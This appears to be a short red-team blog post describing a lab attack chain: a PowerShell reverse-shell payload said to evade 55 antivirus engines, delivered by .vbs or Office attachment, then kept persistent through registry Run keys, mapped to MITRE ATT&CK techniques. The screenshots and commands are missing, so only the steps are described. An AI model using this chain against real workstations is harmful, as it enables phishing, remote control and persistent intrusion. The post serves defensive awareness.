Red Teaming Series — Antivirus Bypass

We constructed a malicious payload capable of evading detection across 55 antivirus engines (VirusTotal platform):

Lab Preparation

• Windows 10 “victim” (with Firewall and AntiVirus active)
• Windows 10 “attacker” with CommandoVM framework:

Attacker Set-Up:

We deployed a PowerShell script (ReverseTCP Shell – link) to generate the payload:

The script generates two distinct outputs, both PowerShell and CMD commands:

Attack Execution

The generated output can be embedded within a “.vbs” file or within Microsoft Office documents. Users frequently receive emails with attachments of this type:

Antivirus Ineffectiveness

The user, even when executing an antivirus scan, receives no associated threat detection or alert:

Upon document execution, the attacker gains full control of the workstation with the same privileges as the compromised user. The attacker can upload/download files present on the target system, capture screenshots, and perform other post-exploitation actions. Our Managed SOC teams have observed this pattern across multiple intrusion campaigns:

Persistence

To maintain access to the victim system, the payload must execute at each system startup. Multiple techniques exist to achieve this objective. One approach involves injecting malicious code into specific registry keys:

• 

By replacing “calc.exe” with the previously generated command, the attacker achieves workstation control at each system restart without triggering any detection alert. This technique—combining T1566.002 (Phishing: Spearphishing Attachment), T1204.002 (User Execution: Malicious File), T1547.001 (Boot or Logon Autostart Execution: Registry Run Keys), and T1059.001 (Command and Scripting Interpreter: PowerShell)—demonstrates how signature-based defenses alone remain insufficient against obfuscated, multi-stage payload delivery chains.